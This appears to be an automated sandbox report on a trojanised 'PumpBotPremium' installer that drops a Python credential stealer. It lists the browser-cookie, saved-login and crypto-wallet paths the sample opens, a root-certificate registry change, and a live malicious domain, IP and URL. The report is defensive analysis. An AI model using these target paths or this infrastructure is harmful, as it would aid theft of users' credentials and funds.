Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Files VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Telegram VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00238470 GetLocalTime, 3_2_00238470
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002116C0 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 3_2_002116C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Adds / modifies Windows certificates
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob Jump to behavior

Stealing of Sensitive Information
barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb Jump to behavior
Yara detected Generic Python Stealer
Source: Yara match File source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BlockchainConnector.exe PID: 7736, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, type: DROPPED
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BlockchainConnector.exe PID: 7736, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected Generic Python Stealer
Source: Yara match File source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BlockchainConnector.exe PID: 7736, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545725 Sample: PumpBotPremium.msi Startdate: 30/10/2024 Architecture: WINDOWS Score: 92 69 tinyvago.com 2->69 71 www.tinyvago.com 2->71 75 Suricata IDS alerts for network traffic 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 AI detected suspicious sample 2->79 81 Yara detected Generic Python Stealer 2->81 10 msiexec.exe 83 42 2->10         started        13 msiexec.exe 4 2->13         started        signatures3 process4 file5 61 C:\Windows\Installer\MSI8554.tmp, PE32 10->61 dropped 63 C:\Windows\Installer\MSI7CB7.tmp, PE32 10->63 dropped 65 C:\Windows\Installer\MSI7C87.tmp, PE32 10->65 dropped 67 4 other malicious files 10->67 dropped 15 aipackagechainer.exe 1 5 10->15         started        17 msiexec.exe 33 10->17         started        process6 file7 20 BlockchainConnector.exe 1 116 15->20         started        23 powershell.exe 2 29 15->23         started        49 C:\Users\user\...\aipackagechainer.exe, PE32 17->49 dropped 51 C:\Users\user\...\BlockchainConnector.exe, PE32+ 17->51 dropped process8 file9 53 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 20->53 dropped 55 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 20->55 dropped 57 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 20->57 dropped 59 80 other files (71 malicious) 20->59 dropped 25 BlockchainConnector.exe 24 20->25         started        29 conhost.exe 20->29         started        31 powershell.exe 11 23->31         started        33 powershell.exe 23->33         started        35 powershell.exe 23->35         started        37 2 other processes 23->37 process10 dnsIp11 73 tinyvago.com 167.99.214.194, 49735, 80 DIGITALOCEAN-ASNUS United States 25->73 83 Antivirus detection for dropped file 25->83 85 Multi AV Scanner detection for dropped file 25->85 87 Found many strings related to Crypto-Wallets (likely being stolen) 25->87 89 2 other signatures 25->89 39 cmd.exe 1 25->39         started        41 conhost.exe 31->41         started        43 conhost.exe 33->43         started        45 conhost.exe 35->45         started        47 conhost.exe 37->47         started        signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
167.99.214.194
 tinyvago.com United States
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
tinyvago.com 167.99.214.194 true
www.tinyvago.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.tinyvago.com/pip/x/requirements.php true
    		unknown